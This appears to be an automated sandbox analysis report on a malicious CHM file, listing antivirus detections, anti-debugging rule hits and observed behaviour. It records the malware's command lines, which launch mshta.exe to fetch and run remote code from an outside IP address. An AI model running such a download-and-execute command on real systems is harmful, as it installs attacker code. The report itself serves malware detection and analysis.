Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 22, 2023, 9:41 a.m. | June 22, 2023, 9:43 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "FfwKVdIpBESezu" C:\Users\test22\AppData\Local\Temp\d892f170764e99dae34d7dded5da591b8e2a05791a5f85fc360ee2a524601faf.chm
3032
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
cmdline | mshta.exe http://141.105.65.165/data/3.html , |
cmdline | "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html , |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 141.105.65.165 |
Lionic | Trojan.HTML.Generic.4!c |
CAT-QuickHeal | CHM.ScarCruft.Trojan.47762 |
McAfee | Generic .mj |
Sangfor | Trojan.Generic-Script.Save.f8c288c6 |
Symantec | Downloader |
ESET-NOD32 | HTML/TrojanDownloader.Agent.NLW |
TrendMicro-HouseCall | Trojan.HTML.DLOADER.MT |
Avast | Other:Malware-gen [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
Tencent | Win32.Trojan-Downloader.Ader.Yimw |
Sophos | Troj/HTMLDl-XN |
DrWeb | JS.DownLoader.6195 |
TrendMicro | Trojan.HTML.DLOADER.MT |
McAfee-GW-Edition | Generic trojan.mj |
Antiy-AVL | Trojan/HTML.Agent |
ViRobot | CHM.S.Downloader.394691 |
ZoneAlarm | HEUR:Trojan-Downloader.Script.Agent.gen |
GData | HTML.Trojan-Downloader.HTARun.A |
Detected | |
AhnLab-V3 | Trojan/CHM.Agent |
ALYac | Trojan.Downloader.CHM |
Rising | Trojan.MouseJack/HTML!1.BE26 (CLASSIC) |
Fortinet | HTML/Agent.FY!tr |
AVG | Other:Malware-gen [Trj] |
dead_host | 141.105.65.165:80 |